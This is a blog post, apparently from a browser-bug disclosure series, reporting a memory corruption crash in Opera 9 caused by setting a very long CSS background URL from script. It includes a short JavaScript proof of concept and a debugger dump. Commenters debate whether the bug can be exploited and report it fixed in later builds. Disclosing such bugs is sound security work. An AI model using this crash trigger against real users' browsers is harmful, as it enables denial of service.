MoBB #26: Opera CSS Background
The following bug was tested on the latest version of Opera 9 on a fully-patched Windows XP SP2 system. A memory corruption issue can be triggered by setting the background property of any DHTML element to a long HTTPS URL.
var a = document.createElement('a');
var b = 'XXXX';
while (b.length <= 1024*1024) b+=b;
a.style.background = 'url(https://' + b + ')';
Demonstration
eax=0c4f0020 ebx=00000000 ecx=0c4f0020
edx=0a4b0030 esi=00953ff8 edi=00200008
eip=67befb98 esp=0012e38c ebp=0012e404
Opera_679e0000+0x20fb98:
67befb98 668b32 mov si,[edx] ds:0023:0a4b0030=0000
This bug will be added to the OSVDB:
Opera CSS Background Property HTTPS Memory Corruption
posted by hdm @ 1:38 AM
13 comments
links to this post
13 Comments:
why https? It crashes with plain http too.
Good catch! I tested all of the protocol handlers trying to figure out which one was triggering - must have missed plain http somehow :-)
So is this just a crash bug erroneously published as a security flaw, or is it actually exploitable?
So far, it doesn't look exploitable beyond a crash. Rumor is that the Opera team feels the same way. A couple security companies classified this as "critical" for some reason - I wonder if they even bothered to test it.
Confirmed crash in Opera 9.00, but seems to be fixed already in the Opera 9.01 weeklies.
this vulneraility IS exploitable for code execution!
versions 8.x are not affected.
Care to share an example? I haven't been able to get a memory mapping to reach the page that is dereferenced.
It is not exploitable, according to, well, everyone in the know :)
It's already fixed in new Opera weekly build.
They may have fixed the http/https issue, but I was still able to trigger this bug using the latest version of CSSDIE.
I have weekly build 8552 and I have no problem with it.
Seems like that it doesn't crash the browser in FreeBSD version of Opera
Opera 9.01 build 8509 is NOT vulnerable.
Greetings,
janbar.:))
Post a Comment
Links to this post:
Create a Link
<< Home